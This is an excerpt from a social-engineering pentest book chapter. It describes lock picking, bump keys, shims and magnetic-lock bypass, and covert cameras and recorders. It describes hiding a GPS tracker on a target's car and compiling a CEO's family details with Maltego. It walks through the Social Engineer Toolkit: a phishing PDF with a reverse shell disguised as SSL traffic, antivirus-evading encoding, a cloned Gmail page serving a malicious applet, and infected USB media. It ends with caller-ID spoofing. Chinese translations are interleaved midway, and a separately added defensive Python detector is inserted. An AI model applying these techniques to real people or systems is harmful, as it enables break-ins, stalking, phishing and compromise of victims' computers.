A good recommendation is to not let the first time you play with a lock pick be in a critical situation. Personally, I went out and bought a few Master padlocks of differing sizes. After I was able to successfully pick all of them I then bought a set of practice locks, something like those shown in Figure 7-5. These come in many different pin types. Locks contain varying pin types, which can add to the level of difficulty in picking. Having practice locks of varying pin types and sizes maximizes the effectiveness of your practice sessions.

 

Figure 7-5: These see-through locks allow you to see how you are doing.


I have even seen some very nice setups at different conferences that would be excellent for learning, like a homemade lock wall. Of course, as you gather intel on your target, taking pictures or just making mental notes of the types, makes, and models of the locks that might block your path to success is a good idea. Knowing this information can help you prepare before you engage in your social engineering attempt.

 

Practical Usage

 

Lock picking in the movies and on TV is portrayed such that one just puts the lock pick in and a few seconds later the door magically opens. Sure, some people pick locks that well, but the majority of people will find success slowly, after countless times applying too much tension, getting frustrated, and then at last learning how to truly rake and pick a lock. Raking is a talent in itself. This is where you use a rake tool and gently slide the rake in and out of the lock while applying light pressure to the tension wrench. This technique works on many types of locks, enabling them to be “picked” using this simple method. Learning to rake efficiently teaches a social engineer a lot about how to use the tension wrench properly and what it feels like when the lock is picked.

 

Many companies are starting to use RFID, magnetic badge cards, or other types of electronic access, which may lead one to believe that lock picks are obsolete. They are not, and neither is the skill of lock picking. It is a good skill to have that can save you in a pentest.

 

Here is an example of the benefit of carrying lock picks with you: On one engagement I came upon an obstacle that could not be social engineered—a door. Pulling out a trusty pocket-sized lock pick set and using the raking method, I gained access in about 30 seconds. Many social engineers have stories like this one, where understanding a little about locks and having the right tools meant success in the end. It is too often the case that companies will spend thousands or even millions of dollars on their hardware, firewalls, IDS systems, and other protection methods, and then put them all in a room with cheap glass and a $20 lock protecting it.

 

Practice is essential because picking a lock always carries the risk of being seen or caught. You must be quick about picking a lock to reduce that risk. Some places install cameras to catch people in the act, but in the end, unless the camera is manned by a live person, it will only record a person breaking in and stealing the servers.

 

In addition, many cameras can be easily rendered useless by using simplistic methods of LED lights shined right into the lens or wearing a hat or hood to cover your face.

 

Picking Magnetic and Electronic Locks

 

Magnetic locks have become more popular because they are very inexpensive to run and provide a certain level of security because they are not a traditional lock that can be picked. Magnetic locks come in all shapes, sizes, and strengths. Magnetic locks, however, also offer a level of insecurity: If the power goes out most magnetic locks will disengage, unlocking the door. This is, of course, if the lock is not hooked up to a backup power source.

 

Johnny Long, world-renowned social engineer and hacker who created the Google Hacking Database and author of No Tech Hacking, tells a story of how he bypassed a magnetic lock using a coat hanger and washcloth. He noticed the locks were disengaged based on the motion of an employee walking toward the door. He also noticed a gap in the doors that was large enough to slide a cloth attached to a hanger through. Waving the cloth around released the lock and gave him access.

 

I recently had a chance to test out this technique. Sure enough with a little effort and testing different lengths of hanger, I gained access in under two minutes. What amazed me the most about this is that despite how much money was spent on the professional, commercial-grade lock and metal doors with bulletproof glass windows in them, with backup power sources to the locks and autolocking bolt locks if the power goes out, it was all thwarted by a hanger with a rag.

 

Of course there are higher-tech ways of picking these locks. Some have created RFID cloners, a small device that can capture then replay the RFID code unlocking the doors. There are machines to copy magnetic key cards as well.

 

Miscellaneous Lock-Picking Tools

 

In addition to tension wrenches and picks, a social engineer may want to employ some other tools, such as shove knives, bump keys, and padlock shims, to gain physical access. Some of these tools, when mastered, can make the job of physical access effortless.

 

Shove Knives

 

The shove knife, shown in Figure 7-6, is hailed as the quickest way to gain access to office doors or any door with a knob lock, such as server rooms or office doors. Basically this knife can slip into a position where it can release the latch without damaging the door.

 

Figure 7-6: A typical shove knife.


Bump Keys

 

Bump keys have been around for ages, but have been getting a lot of notice in the news because they have been used in crimes. Bump keys are specially designed keys that allow the user to “bump” the key into the lock with light force that when done right, puts all the pins in proper alignment and allows the plug to be turned without damaging the lock. The basic technique is that you put the key inside the lock and pull it out one or two notches; then you put light tension on the key and use a screwdriver or other small object to “bump” the key into the lock using light force. This action forces the pins into the proper position and then allows the plug to turn. Figure 7-7 shows a bump key.

 

Figure 7-7: A typical bump key for a door.


Padlock Shims

 

A shim is a small piece of thin metal that is slid into the base of the padlock and used to release the locking mechanism. The shim is shoved in at the base of the lock shaft, separating the locking mechanism from the shaft and unlocking the padlock. This is shown in Figure 7-8.

 

Figure 7-8: How a shim works.


Figure 7-9 shows professional-grade shims but you can also make a pair out of an aluminum can.

 

Some recent stories (www.youtube.com/watch?v=7INIRLe7x0Y) show how easy it is to bypass a hotel or other door with a chain lock. This particular video shows how an attacker can tie a rubber band around the lock and, using the natural tension of the rubber band, get the chain to slide right off. As well, MIT has a freely distributed guide (www.lysator.liu.se/mit-guide/MITLockGuide.pdf) on lock picking that is much more in-depth than the brief introduction included in this chapter.

 

Figure 7-9: Professionally made shims.


You might be wondering whether locks that are impossible, or at least hard to pick, exist. The Bump Proof BiLock (www.wholesalelocks.com/bump-proof-bilock-ult-360.html) is just such a lock. Its two cylinders make it near-impossible to bump or pick easily.

 

One of the problems I have seen in my career is not the lock choice but rather the security supporting the lock. Very often, a company will buy a heavy-duty lock that requires biometrics and key access to get to the server room, but right next to the door is a small, single-paned glass window. Who needs a lock pick then? A thief will break the glass and gain access without much effort.

 

The moral of the story is that a lock alone won’t make you secure. Security is a mindset, not a simple piece of hardware.

 

Not every social engineer must be an expert locksmith, but having some basic knowledge on how locks work and a bit of experience picking locks might make the difference between a social engineering success and failure.

 

This discussion just scratched the surface of the topic of the lock-picking tools a social engineer can use. One of the other toolsets that is invaluable for a social engineer is recording devices, as discussed in the next section.

 

Cameras and Recording Devices

 

Cameras and recording devices seem so “peeping Tom-ish” that many times the question arises, “Why? Why use hidden cameras and covert recording devices in an SE gig?” Good question. It has a simple two-part answer: for proof and protection.

 

Let’s discuss the concept of proof. As already mentioned, a social engineering audit is where you are testing people. It is trying to help a company patch the human infrastructure to be more secure. Unfortunately, these same principles are used when malicious social engineers do their deeds too. Many people are reluctant to admit they can be duped unless they see the proof or one of their colleagues being duped. The embarrassment from being tricked through a simple social engineering attack or the fear of employer repercussions can cause people to say it never happened. A recording device can provide that proof, but it can also be used to train both you as an auditor and your client on what to watch for.

You must never use these devices with the intent of getting an employee in trouble or to embarrass him or her. However, the information you get from these devices provides a great learning tool afterward for showing the staff who fell for the social engineer’s pretext and how. Having proof of a successful hack can go a long way toward educating the company and its staff on how they should react to malicious social engineering attempts—in other words, how to notice and then either avoid or mitigate these attacks.

The second reason to use recording devices in an SE gig is for protection, mainly for the professional social engineers. Why? Seeing every microexpression, facial gesture, and little detail that you can use later on is impossible. Capturing this information on camera gives you something to analyze so you do get all the details needed for the attack. It can provide protection in that you have a recording of the events to prove what was and was not done, but also in that it doesn’t leave everything to your memory of the situation. It also is a good educational tool for analyzing failed or successful SE attempts.

This principle is used in law enforcement. Police and federal agents record their traffic stops, interviews, and interrogations for protection, education, and proof to be used in court.

These principles also apply for audio recording. Capturing a phone call or conversation on a recording device serves all the same purposes as the ones mentioned previously for video. An important point to mention here is that recording people without their consent is illegal in many areas of the world. Make sure your ability to use recording devices is part of the social engineering contract you have signed with the company.

Audio recording devices come in all shapes and sizes. I own a small voice recorder that is a real working pen. This device sits nicely in my front pocket and records sound clearly up to 20 feet away. With 2 GB of internal storage I can easily record a couple hours of conversation without worry and then analyze it later on.

Cameras

Nowadays you can find cameras shaped like buttons; pens; hidden in the tips of pens; inside clocks, teddy bears, fake screw heads, smoke alarms; and basically any other device you can imagine. Locating a camera like the one shown in Figure 7-10 isn’t too hard.

Figure 7-10: The camera is hidden in the knot of the tie.

Yes, believe it or not, this tie is hiding a full-color camera that runs on a 12-volt battery and connects to a mini recording device. Wearing this tie into a social engineering audit ensures you capture everything within a 70-degree angle.

Using a recording device like this gives an advantage. The social engineer can focus on the pretext or the elicitation that he or she practiced beforehand without having to worry about trying to remember every detail.

One story I like to tell is how I used an audio recording device in an audit where I was testing a theme park that sells tickets online. This company operates a small ticket window with one woman behind it manning a computer with a Windows operating system on it. The pretext was that I bought tickets online in the hotel but couldn’t print them out. To assist I printed them to PDF and emailed the document to myself. I then used a line similar to this: “I know this is an odd request, but my daughter saw your ad at a restaurant. We went back to the hotel and bought the tickets online with the discount code and then I realized I couldn’t print them out. The hotel printer was on the fritz and I didn’t want to lose the tickets. So I printed them to a PDF and sent it to my email account. Could I just log in or have you log in to my email to get the document? “ Of course, the “kids” were waiting in the sidelines and as a dad I didn't want to disappoint. Sure enough as the employee clicked the PDF, she wasn’t presented with our tickets but a malicious piece of code that was scripted to give me access to her computer and start autocollecting data. Recording the conversation, the method used, and the heart strings that were pulled helped to educate the company so this attack could not be repeated, costing it thousands or more dollars.

One device that is available uses a “pay-as-you-go” cellular card to send audio content via a cellular signal to any number programmed. Or the social engineer can call in and hear what is going on at any time. This device can save the social engineer dozens of hours in obtaining passwords or personal information that she can use in a social engineering attack.

One can spend literally dozens of hours (and I could write dozens of pages) talking about all the neat and cool cameras out there. Figures 7-11 and 7-12 show a few pictures from a popular law enforcement provider of “spy equipment” (www.spyassociates.com). All of these pictures are hidden cameras or audio recording devices, believe it or not. You can use each of these devices to covertly record a target for later inspection.

Figure 7-11: All of these devices capture audio and color video from a hidden camera except for the pen, which is an audio recorder.

Figure 7-12: These devices also capture audio and video from hidden cameras.

Using the Tools of a Social Engineer

The preceding section outlines some of the different types of recording devices out there, but the question is still how to use them. Amazing as it seems, using cameras or recording devices follows the same principles as any other tool of the social engineer, such as pretexting or elicitation.

Practice is essential. If you don’t determine the proper placement for a body-worn camera or audio recording device, you might end up capturing video of the ceiling or audio of a muffled voice. Setting up the appropriate outfit and gear you might carry and finding the right location for the camera or audio device is a good idea. Try sitting, standing, or walking and see how these movements affect the sound and video quality.

From a professional social engineer standpoint I must stress again the seriousness of getting the contract to outline your ability to record. Doing it without a contract can be a legal nightmare. Checking the local laws to make sure you cannot get in trouble for use of these devices is also a good idea.

Never would a social engineer use these devices to record people in embarrassing situations or to capture people in personal circumstances.

Discussion on this topic can go on and on, but hopefully this brief overview of the tools that are available and how to use them can open up the options out there to social engineers.

In the next section I will give a few examples of the usage of certain tools that can be very useful to a social engineer.

Using a GPS Tracker

Social engineers often want to track targets before or after they leave the office. The stops the target makes on the way to the office can tell a lot about him. Compiling and analyzing this information can help to develop a proper pretext or good questions to use to elicit the right response from the target. Knowing the start and end times for his day can also be valuable for physical red team attacks, where the goal of the team is to actually break in and recover valuable assets to show the company their physical weaknesses.

You can track people in many different ways, but one way is to use a device designed to help track a target. One such device is a GPS Tracker; for example, the notable SpyHawk SuperTrak GPS Worldwide Super TrackStick USB Data Logger available from www.spyassociates.com. One type of many, these devices can range from $200–600. SpyHawk SuperTrak magnetically sticks to a vehicle and can store days’ worth of data on the target. The following sections provide a walkthrough from setup to usage of this little device.

The SpyHawk SuperTrak GPS TrackStick

Installing the software needed to make the device run is painless. Just clicking the software that came with the device and following the on-screen steps will install all the software needed. It installs without any problems and the setup afterwards is equally as painless. The TrackStick screen, shown in Figure 7-13, is very intuitive to use and easy to set up.

Figure 7-13: TrackStick Manager employs an intuitive, simple-to-use interface.

As you can see, it provides options to choose log times, time zones, and other custom settings.

Using the SpyHawk TrackStick

The SpyHawk SuperTrak GPS Worldwide Super TrackStick device itself is lightweight and easy to use and hide. It comes with an on/off switch but has some neat technology. When it feels movement it turns on and starts logging. When the movement stops for a period of time, it stops logging.

The directions say to hide the device somewhere with the powerful magnets against metal but the device pointing up or toward plastic. Losing the device on its first run is always a concern, so finding a nice secure place under the hood can ease those worries and give easy access to the sky view. Once you have access (either internal or external) to the target’s car, find a secure location in a wheel well, under the hood, or in the back of the car by the trunk. Anywhere that there is metal will work. If you have internal access, popping the hood and putting it somewhere in the engine compartment can ease concerns over discovery and/or loss.

In my first tests, I found a place in the engine compartment to place the device. Even through the metal of the hood the device logged perfectly. Another placement idea is to wait until the target’s car is unlocked and then place it in the trunk under the carpet or by the rear lights. On a personal side note, when I ran this test, the device stayed on five days collecting data, some of which you can see in the following figures. As shown in Figure 7-14, it looks like the target likes to speed.

Figure 7-14: The target likes to speed.

Time, date, and duration stamps help you outline a target’s movement, as shown in Figure 7-15.

Figure 7-15: Tracking the target’s movements.

Figure 7-16 shows the icons on a Google Earth map—they show speed, times, time stopped, and more.

Figure 7-16: Device output rendered in Google Earth.

As you can see in Figure 7-17, the software creates nice maps of the whole route.

Figure 7-17: Mapping the target’s route with SuperTrack.

Using Google Earth or Google Maps you can even get close-ups (see Figure 7-18).

Figure 7-18: Zeroing in on the target’s travels.

Reviewing the GPS Tracker Data

The data collection is where a social engineer will see the most benefit. Being able to track every time the CEO of the target company stopped for coffee, what his favorite shop is, and what gym he attends can enable the social engineer to plan an attack with the highest rate of success.

Knowing the locations and stops can tell the attacker where he or she will have the best opportunities for cloning an RFID badge or making an impression of a key. The bonus is that you can get this information without having to stalk the target by being the creepy guy next door. The following figures show how these details can give the attacker the upper hand.

Notice the detail in Figure 7-19. You can see the speed the target drove, and the time and date he stopped. If you want to see the location in more detail, click the Google Maps link. Click the Export button to export the whole data set to a clickable Google Map or Google Earth Map.

Figure 7-19: The data set.

After you open the data set in Google Earth you can see the points he stopped, the route he took to and from his destination, and the times he stopped, as shown in Figure 7-20.

Figure 7-20: Stops along the way.

If you want to see his whole route, it’s no problem—just export his whole route to one of many formats, as shown in Figure 7-21.

Figure 7-21: Exporting the target’s entire route.

Figure 7-22 shows the data exported and displayed in Google Maps.

Figure 7-22: The target’s route rendered in Google Maps.

This short section could not possibly cover all the tools available to a social engineer. The keys to success are practice and research. Knowing what tools are available to social engineers can make or break the audit. That is just half the battle, though, because then as a professional social engineer, you must practice, practice, practice. Knowing how to properly use the tools will make a huge difference.

On the Social Engineer Framework located at www.social-engineer.org, I will be reviewing many tools that social engineers can use to enhance their practice.

Physical tools are just one part of being a successful social engineer, though. All the physical tools on Earth are backed up by quality and thorough information gathering, as discussed in Chapter 2. The next section covers some of the most amazing information-gathering tools in the world.

Online Information-Gathering Tools

As previously discussed, information gathering is a key aspect of social engineering. Not spending enough time on this point alone can and will lead to failure for the social engineer. Nowadays many tools are available to the social engineer that can help collect, catalog, and utilize the data that is collected.

These tools can literally change the way a social engineer views and uses data. No longer are social engineers limited to what they can find in routine searches; these tools open every resource on the Internet to them.

Maltego

Collecting and cataloging information is probably a weak point for many people. What if a tool existed that enabled you to perform dozens of searches specific to a domain, IP address, or even a person? What if it gave you the weightings of those findings, showing what was more likely to be important or not? What if this tool then had a GUI interface that showed everything in color-coded objects that you can export and utilize? On top of it all, what if a free version of this amazing tool was available?

Enter Maltego. Maltego is a social engineer’s dream tool. This amazing tool is made by the guys at Paterva (www.paterva.com). Maltego has a community edition available for free download from their website, which is also included in every edition of BackTrack 4. If you want to remove the limitations of the free edition—like the number of transforms you can run and saving data—spending around $600 will get you a full license.

The best way to show the power of Maltego is to tell a story of an audit I was involved in. I was tasked with auditing a small company that had a very small web presence. The target was to get to the CEO but he was heavily guarded, paranoid, and didn’t use the web much. As the owner of a printing company he was all about his business and didn’t use technology to its fullest. Surely this task was going to be a difficult one.

I whipped out Maltego first. Using just the company’s domain and pulling up all e-mail addresses linked with Whois info and the domain itself gave me a nice base of information to start searching with. I then delved deeper to see whether the CEO’s email that came up was used on any other sites or URLs. I found he had written a couple reviews for a local restaurant and linked his email address publicly. He also used it in a review he did for a restaurant in a different state. Reading his review fully revealed that he had visited that restaurant when he was visiting family in that state, even naming his brother in the review. With a few more searches in Maltego I located his parents and brother in that area. A few more searches with the family name and I found a few links that spoke about using another email he had from a business he started there to discuss a problem he had had with a local church and his switch to a new one. Later on, I found a blog post linking his Facebook page with pictures of his family after they left a ball game where their favorite team played. Here is what I was able to find in less than two hours of searching using Maltego:

  • His favorite food
  • His favorite restaurant
  • His kids’ names and ages
  • That he is divorced
  • His parents’ names
  • His brother’s name
  • Where he grew up
  • His religion
  • His favorite sports team
  • What his whole family looked like
  • His past business

A day later I mailed a package to the target containing information about a raffle for local businesses. The offer was that if he wins he gets a free dinner at the restaurant he listed as his favorite, and three free tickets to a Yankees game. All the business has to do is agree to have a short meeting with a sales rep to talk about a local charity. If the business agreed to that meeting its name would be entered into the raffle for a chance to win the Yankees tickets. My pretext’s name was “Joe” and I prepared an outline for a call to the CEO. My goal was to get him to accept a PDF from me that outlined what we want and entered him in the drawing. By the time I called, he should have received my “mailed” package and I could easily use the line, “Yes, he is expecting my call.”

While on the phone with “Joe,” the CEO accepted and opened an email containing all the raffle details as well as a maliciously encoded file, ensuring the delivery of the reverse shell, giving me access to his network.

Of course, he got nothing on his screen and was frustrated that Adobe kept crashing. I told him, “I’m sorry you are having problems opening the file; we will include your name in the raffle and mail out some additional info to you today.” But before that package went into the mail and arrived I called a report meeting to discuss how the target was completely compromised.

The majority of this success was due to the use of one tool—Maltego. It helped collect, organize, and categorize data for the best use.

How did Maltego help me succeed in this gig?

Think of Maltego as a relational database of information, finding links between bits of information on the Internet (referred to as entities within the application). Maltego also takes a lot of the hard work out of mining information such as email addresses, websites, IP addresses, and domain information. For example, you can search for any email address within a target domain or domains automatically with a few clicks. By simply adding the “EMAIL” transform on the screen then clicking in the box and typing the email I want to search for, I was given a view like what is seen in Figure 7-23.

Figure 7-23: A representation of the information you can glean from Maltego.

Why Use Maltego?

Maltego automates much of the information gathering and large data correlation for the user, saving hours of Googling for information and determining how all that information correlates. Finding these data relationships is where the real power of Maltego comes into play. Although the mining is useful, discovering the relationships between the information is what will help the social engineer.

At www.social-engineer.org/se-resources/, I have posted a few videos outlining how to use Maltego to get the most out of it. In the earlier story Maltego contributed largely to the exercise’s success, but the compromise came with another amazing tool.

SET: Social Engineer Toolkit

Social engineers spend much of their time perfecting the human aspect of their skills, yet many attack vectors call for the ability to produce emails or PDFs embedded with malicious code.

Both of these things can be done manually using many of the tools that exist in BackTrack, but when I was starting the www.social-engineer.org website I was talking to a good friend of mine, Dave Kennedy. Dave is the creator of a very popular tool called FastTrack that automated some of the most common attacks used in a penetration test using Python scripts and a web interface. I told Dave that I thought it would be a neat idea to develop something like FastTrack but just for social engineers—a tool that would allow a social engineer to create PDFs, emails, websites, and more with a few clicks and then focus more on the “social” part of social engineering.

Dave thought it over and decided that he could create a few easy Python scripts that would allow the social engineer to create PDFs and send emails with malicious code embedded in them. This was the birth of the Social Engineer Toolkit (SET). At the time of writing, SET had been downloaded more than 1.5 million times, and had quickly become the standard toolkit for social engineering audits. This section walks you through some of the main points of SET and how to employ them.

Installation

Installation is simple. All you need to have installed are Python and the Metasploit framework. Both of these are installed in the BackTrack distribution and there is no setup to worry about—in BackTrack 4 even the SET tool is installed. In case it is not or you are starting from scratch, installation is simple. Navigate to the directory you want it in and run this command in a console window:

svn co http://svn.secmaniac.com/social_engineering_toolkit set/

After executing this command, you will have a directory called set that will contain all the SET tools.

Running SET

Running SET is, again, an easy process. Simply typing ./set while in the set directory starts the initial SET menu.

This shows you exactly what the SET menu looks like. A comprehensive, in-depth tutorial about each menu option is available at www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_%28SET%29, but the following sections explain two of the most widely used aspects of SET.

First up is a discussion of the spear phishing attack, followed by a discussion of the website cloning attack.

Spear Phishing with SET

Phishing is a term coined to describe how malicious scammers will “cast a wide net” using targeted emails to try to draw people to websites, open malicious files, or disclose information that can be used for later attacks. Being able to detect and mitigate these attacks is essential for survival in the Internet world today.

SET allows the auditor to test their clients by developing targeted emails and then logging how many employees fall for these attacks. This information can then be used in training to help employees see how to spot and avoid these traps.

To perform a spear phishing attack in SET, choose option 1. After pressing that number you are presented with a few options:

  • 1. Perform a Mass Email Attack
  • 2. Create a FileFormat Payload
  • 3. Create a Social-Engineering Template

The first option is where you actually launch an e-mail-based spear phishing attack. The second option is where you create a malicious PDF or other file to send in your emails. Finally, option 3 is where you can create templates for use later on.

Launching an attack in SET is as simple as choosing the right options in the menus and then clicking Launch. For example, if I wanted to launch an e-mail attack that would send a victim a malicious PDF disguised as a tech report, I would choose option 1, Perform a Mass Email Attack.

Next, I would choose an attack vector (option 6) that was present in many versions of Adobe Acrobat Reader: Adobe util.printf() Buffer Overflow.

The next few choices set up the technical side of the attack: using Metasploit to receive the reverse shell (the connection back from the victim’s computer) and picking the port it comes back on so as to avoid IDS or other systems. Choose option 2, Windows Meterpreter Reverse_TCP.

 

选择端口 443,这样流量看起来就像是 SSL 流量。SET 制作恶意 PDF 并设置侦听器。

Select port 443 so the traffic looks as if it is SSL traffic. The SET makes the malicious PDF and sets up the listener.

 

执行此操作后,SET 会询问您是否要将 PDF 的名称更改为更隐蔽的名称,例如TechnicalSupport.pdf ,然后要求您填写发送和接收的电子邮件信息。最后,SET 会发送一封看似专业的电子邮件,试图诱骗用户打开附加的 PDF。图 7-24显示了受害者收到的示例。

After doing so, SET asks you if you want to change the name of the PDF to something more devious like TechnicalSupport.pdf and then asks you to fill in the email information for both sending and receiving. Finally, SET sends out a professional-looking email that will try to trick the user into opening the attached PDF. A sample of what the victim receives is shown in Figure 7-24.

 

图 7-24:一封带有简单附件的无害电子邮件。

Figure 7-24: An innocuous email with a simple attachment.

 
f0724.tif
 

电子邮件发送后,SET 设置监听器并等待目标打开文件。一旦目标点击 PDF,监听器就会做出响应,处理传入的恶意代码并让攻击者访问受害者的计算机。

After the e-mail is sent, SET sets up the listener and waits for the target to open the file. Once the target clicks the PDF, the listener responds by handling the incoming malicious code and giving the attacker access to the victim’s computer.

 

令人惊讶的是(或者可能并不令人惊讶,这取决于您的观点),所有这些操作可能只需点击六七次鼠标即可完成,并且审计人员可以自由地专注于这些攻击的实际社会工程方面。

Surprisingly (or perhaps not, depending on your outlook), all of this was done in maybe six or seven mouse clicks, and it leaves the auditor with the freedom to focus on the actual social engineering aspect of these attacks.

 

这是一种毁灭性的攻击,因为它利用了客户端软件,并且很多时候屏幕上没有任何迹象表明发生了任何不好的事情。

This is a devastating attack because it exploits a client-side piece of software, and many times there is no indication onscreen that anything bad happened.
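
Since nothing shows onscreen, detection of this attack has to come from the network side. The following added example (not code from the book or from SET) checks whether the first bytes a client sends to port 443 form a TLS ClientHello record; a plain reverse_tcp session parked on 443 "so the traffic looks as if it is SSL" does not. The flow records are constructed.

```python
"""Spot non-TLS traffic on port 443: the "looks like SSL" trick above only
works if nobody checks that the bytes actually are TLS. Added example, not
code from the book or from SET; the flow records below are constructed."""
from dataclasses import dataclass

TLS_HANDSHAKE = 0x16          # record content type: handshake
CLIENT_HELLO = 0x01           # handshake message type inside the record
TLS_RECORD_VERSIONS = {0x0300, 0x0301, 0x0302, 0x0303}  # SSL 3.0 .. TLS 1.2 (TLS 1.3 also puts 0x0303 here)
MAX_RECORD_LEN = 16384        # plaintext TLS records are at most 2**14 bytes


def is_tls_client_hello(first_bytes: bytes) -> bool:
    """True if the client's first bytes are a well-formed TLS ClientHello record header.

    Layout: type(1) version(2) length(2), then the handshake header whose first
    byte is the handshake type. Reverse shells, HTTP and raw binary protocols
    fail one of these checks on their first bytes.
    """
    if len(first_bytes) < 6:
        return False
    if first_bytes[0] != TLS_HANDSHAKE:
        return False
    version = int.from_bytes(first_bytes[1:3], "big")
    if version not in TLS_RECORD_VERSIONS:
        return False
    record_len = int.from_bytes(first_bytes[3:5], "big")
    if record_len == 0 or record_len > MAX_RECORD_LEN:
        return False
    return first_bytes[5] == CLIENT_HELLO


@dataclass(frozen=True)
class Flow:
    src: str
    dst: str
    dst_port: int
    first_client_bytes: bytes   # first bytes the client sent, as a sensor or pcap would record them


def suspicious_443_flows(flows):
    """Flows to port 443 whose client does not open with a TLS ClientHello."""
    return [f for f in flows
            if f.dst_port == 443 and not is_tls_client_hello(f.first_client_bytes)]


# Constructed sample: a genuine-looking ClientHello header, an HTTP request sent
# to 443, and a binary stream that is clearly not TLS.
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "203.0.113.10", 443, b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),
    Flow("10.0.0.7", "203.0.113.20", 443, b"GET / HTTP/1.1\r\n"),
    Flow("10.0.0.9", "198.51.100.4", 443, b"\x00\x00\x12\x34\xde\xad\xbe\xef"),
    Flow("10.0.0.9", "198.51.100.4", 80, b"GET / HTTP/1.1\r\n"),   # port 80: outside this check
]

if __name__ == "__main__":
    for flow in suspicious_443_flows(SAMPLE_FLOWS):
        print(f"non-TLS client on 443: {flow.src} -> {flow.dst} {flow.first_client_bytes[:8]!r}")
```

A connection that really is TLS passes this check, so it catches only the plain-TCP-on-443 disguise the text describes.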

 

This is just one of the many attacks that can be launched using SET.

Web Attack Vector

SET also allows the auditor to clone any website and host it locally. The power of this type of attack is that it allows the social engineer to trick users into visiting the cloned site, for example under the pretense of being a developer making changes, or by adding or deleting one letter in the URL so that it points people to the clone.

Once at the cloned website, many different parts of this attack can be launched—information gathering, credential harvesting, and exploiting are just a few.

To run this attack in SET you would choose option 2, Website Attack Vectors, from the main menu. Upon choosing option 2, you are presented with a few options:

  • 1. The Java Applet Attack Method
  • 2. The Metasploit Browser Exploit Method
  • 3. Credential Harvester Attack Method
  • 4. Tabnabbing Attack Method
  • 5. Man Left in the Middle Attack Method
  • 6. Return to the previous menu

A particularly evil attack vector is option 1, a Java Applet Attack. Basically, the Java Applet Attack presents the user with a Java security warning saying that the website has been signed by ABC Company and asks the user to approve the warning.

To perform this attack choose option 1, and then option 2, Site Cloner.

Upon choosing Site Cloner, you will be asked which website you want to clone. Here, you can choose anything you want—the client’s website, a vendor they use, or a government website—the choice is yours. As you might imagine, though, choosing a site that makes sense to the target is essential.

In this exercise, imagine you cloned Gmail. You would be presented with the following on the screen:

SET supports both HTTP and HTTPS
Example: http://www.thisisafakesite.com
Enter the url to clone: http://www.gmail.com
[*] Cloning the website: http://www.gmail.com
[*] This could take a little bit...
[*] Injecting Java Applet attack into the newly cloned website.
[*] Filename obfuscation complete. Payload name is: DAUPMWIAHh7v.exe
[*] Malicious java applet website prepped for deployment

Once you are done with this, SET will ask you what type of connection you want it to create between you and the victim. To use a technology discussed in this book, choose the Metasploit reverse shell called Meterpreter.

SET gives you the option to encode your payload with different encoders. This is to help you avoid getting caught by antivirus systems.

Next, SET launches its own built-in web server, hosts the site, and sets up a listener to catch your victim browsing the website.

Now it is up to the social engineer to either craft an email or a phone call to draw the target to the URL. In the end, the user would see what is shown in Figure 7-25.

The end result is the victim is presented with a Java Applet stating the site has been signed by Microsoft and that the user needs to allow the security certification to be run in order to access the site.

As soon as the user allows the security certification, the attacker receives a command prompt on the victim’s computer.

Figure 7-25: Who wouldn’t trust a digitally signed applet from Microsoft?

Other Features of SET

SET was developed by social engineers with social engineers in mind, so the toolset that it gives the user is based around the common attacks needed by those in the auditing business.

SET is constantly growing and expanding. In recent months, for instance, SET has become capable of handling other attacks besides website cloning and spear phishing; it also houses an infectious media generator. An infectious media generator is where the user can create a DVD, CD, or USB key encoded with a malicious file that can be dropped or left at the target’s office building. When it is inserted into a computer it will execute that malicious payload and cause the victim’s machine to be compromised.

SET can also create a simple payload and a proper listener for it. If the social engineer just wants to have an EXE that is a reverse shell that will connect back to his servers, he can carry this on a USB key for use on an audit. If he finds himself in front of a machine to which he wants remote access, he can put in the USB key, drop the payload file on the computer, and then click it. This will give him a quick connection back to his machines.

A newer attack vector is the Teensy HID attack vector. Teensy devices are tiny programmable circuit boards that can be embedded into things like keyboards, mice, or other electronic devices that get plugged into computers.

SET produces the programming needed to tell these tiny boards what to do when they are plugged in; commands like giving reverse shells or setting up listening ports are common.

One of the newest features of SET is a web interface to the tool. This means that a web server will start automatically to host SET on a webpage for easier use. Figure 7-26 shows what this web interface looks like.

Figure 7-26: The new web interface of the Social Engineer Toolkit.

SET is a powerful tool made to help a social engineer auditor test the weaknesses that usually exist in a company. The SET tool developer is always open to suggestions and help in creating new parts of the tool to continue growing it to become a more popular toolset. Again, www.social-engineer.org has a full explanation of every menu option for review if you want to delve deeper into this amazing tool. Continue to check both www.social-engineer.org and www.secmaniac.com for updates to the Social Engineer Toolkit.

Telephone-Based Tools

One of the oldest tools in the book for social engineers is the telephone. Nowadays, with cell phones, VoIP, and homemade phone servers, the options for how a social engineer can utilize the phone have grown considerably.

Because people are inundated with telemarketing calls, sales pitches, and advertisements, a social engineer needs to be skilled to use the phone successfully in an audit. Despite these limitations, using the phone as a social engineering tool can lead to total compromise of a company in a very short period of time.

In an era where everyone has a cell phone and people carry on personal and deep conversations on the bus, the subway, or in any public place, the phone can be used in many ways. Eavesdropping or calling a target on their cell phone allows for additional vectors that were not available in days past. With the increased numbers of smart phones and computer-like phones on the market, more and more people are storing passwords, personal data, and private information on their phones. This opens up the ability for the social engineer to access the target and their data in many different situations.

Also, being connected 24/7 makes people more ready to give out information quickly if the caller passes a certain set of “criteria” that makes him believable. For instance, if the caller ID on the cell phone indicates that the person is calling from corporate headquarters, many people would give over information with no verification. Both the iPhone and Android smart phones have applications that can be used to spoof your caller ID number to any number you want. Apps like SpoofApp (www.spoofapp.com) allow the social engineer to make calls that look as if they originate from anywhere on earth for a relatively low cost per call. All of this goes to building the credibility of your pretext.

Using the phone for social engineering can be broken down into two different arenas: the technology behind it and planning out what you say.

Caller ID Spoofing

Caller ID has become a commonplace technology in both business and home use. Especially now with cell phones replacing many of the land-based phone lines people use, caller ID is part of daily life. Being aware of this fact and knowing how to use it to your advantage is a must for a successful social engineer.

Caller ID spoofing basically is changing the information that appears on the target’s caller ID display. In other words, though you are placing the call from one number, a different number appears on the target’s caller ID.

One way to leverage this information is to spoof the number you found in a dumpster dive of a vendor used by your target. If the social engineer finds out that they use ABC Tech for computer support, the social engineer can find their number and spoof it when a call is placed to set up an afternoon appointment. Using caller ID spoofing, you can “originate” calls from the following places:

  • A remote office
  • Inside the office
  • A partner organization
  • A utility/service company (telephone, water, Internet, exterminator, and so on)
  • A superior
  • A delivery company

So how do you spoof? The following sections discuss some of the methods and equipment available that a social engineer can use to spoof numbers.

SpoofCard

